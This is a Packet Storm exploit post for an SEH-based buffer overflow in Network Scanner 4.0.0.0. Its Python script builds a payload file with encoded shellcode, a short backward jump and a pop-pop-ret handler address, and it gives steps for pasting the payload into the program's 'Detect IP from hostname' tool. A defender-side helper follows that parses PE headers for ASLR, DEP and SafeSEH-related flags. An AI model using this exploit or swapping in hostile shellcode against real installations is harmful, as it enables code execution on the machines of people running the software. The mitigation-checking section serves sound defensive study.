Network Scanner 4.0.0.0 SEH Overflow

Reported by n30m1nd, 25 Oct 2016. Source: packetstorm (packetstormsecurity.com)

Network Scanner Version 4.0.0.0 SEH Overflow Exploit by n30m1nd. Exploit tested on Win7 64-bit and Win10 64-bit. Generates an "exploit.txt" file for the "Detect IP from hostname" tool.

Code

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-

### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###

# Date: 2016-10-21
# Exploit Author: n30m1nd
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
# Vendor Homepage: http://www.mitec.cz/
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
# Version: 4.0.0.0
# Tested on: Win7 64bit and Win10 64 bit

# Credits
# =======
# PoC by: INSECT.B - http://binsect00.tistory.com
# https://www.exploit-db.com/exploits/39447/
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better

# How to
# ======
# * Run this python script. It will generate an "exploit.txt" file.
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time

# Exploit code
# ============

import struct

# MessageBoxA in NetScan.exe => 004042F1
mbox = (
"\x25\x41\x41\x41"
"\x41\x25\x32\x32"
"\x32\x32\x50\x68"
"\x70\x77\x6E\x64"
"\x54\x5F\x50\x57"
"\x57\x50\x35\x8E"
"\x60\x60\x55\x35"
"\x7F\x22\x20\x55"
"\x50\xC3"
)
# JUMP BACK to our shellcode!
nseh = (
# xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
"\x34\x51"
# jne -32h; Jump if ZF = 0
"\x75\xCC"
)
# pop pop ret => 00402E67
sehh = struct.pack("<L", 0x00402e67)

# Layout: filler, then the MessageBoxA stub padded to 48 bytes, then nSEH + SEH
payl = "A" * (76-48)
payl+= mbox
payl+= "A"*(48-len(mbox))
payl+= nseh + sehh

with open("exploit.txt","wb") as f:
    f.write(payl[:-1])
print payl

"""
NOTE:
The original author of this PoC stated that it was not possible to be
exploited since all addresses inside the binary contain the null byte.
As you can see in this exploit, the null byte is added by default at
the end because strings are null terminated when read from an input
box. This is why we write the payload minus 1 byte, payl[:-1], because
we don't need to write the last null byte for the "pop pop ret" jump
in the "sehh" variable.
"""
```
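As an added defender-side check that is not part of the original exploit: the handler address above points inside the target image, which is exactly the kind of handler that SafeSEH (a handler table in the PE Load Config directory) and the NO_SEH DllCharacteristics flag are designed to reject. The Python 3 helper below reads those opt-in flags and the Load Config directory entry from a PE header; the header it parses in the demo is a constructed stub built by `build_test_pe`, not the real NetScan.exe, and the flag values come from the PE/COFF specification.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* flag values from the PE/COFF specification
DYNAMIC_BASE = 0x0040   # ASLR opt-in
NX_COMPAT = 0x0100      # DEP opt-in
NO_SEH = 0x0400         # image declares it contains no SEH handlers at all

def pe_mitigations(data):
    """Return the opt-in mitigation flags of a PE image given its raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt = e_lfanew + 4 + 20            # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):    # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header for both PE32 and PE32+
    flags = struct.unpack_from("<H", data, opt + 70)[0]
    # Data directory starts at offset 96 (PE32) or 112 (PE32+); entry 10 is Load Config,
    # which carries the SafeSEH handler table on 32-bit images
    dd = opt + (96 if magic == 0x10B else 112)
    lc_rva, lc_size = struct.unpack_from("<II", data, dd + 10 * 8)
    return {
        "aslr": bool(flags & DYNAMIC_BASE),
        "dep": bool(flags & NX_COMPAT),
        "no_seh": bool(flags & NO_SEH),
        "has_load_config": lc_size != 0,
    }

def build_test_pe(flags, load_config_size=0):
    """Constructed minimal PE32 header (not a runnable executable) for exercising the parser."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 68 + struct.pack("<H", flags)
    opt += b"\0" * (96 - len(opt))                            # pad up to the data directory
    dirs = [(0, 0)] * 16
    dirs[10] = (0x1000, load_config_size)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    return dos + b"PE\0\0" + coff + opt

if __name__ == "__main__":
    unprotected = build_test_pe(0)
    hardened = build_test_pe(DYNAMIC_BASE | NX_COMPAT, load_config_size=0x40)
    print("unprotected:", pe_mitigations(unprotected))
    print("hardened:   ", pe_mitigations(hardened))
```

A nonzero Load Config entry only means a handler table may exist; confirming SafeSEH also requires reading SEHandlerTable and SEHandlerCount from that structure, which this helper does not do.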
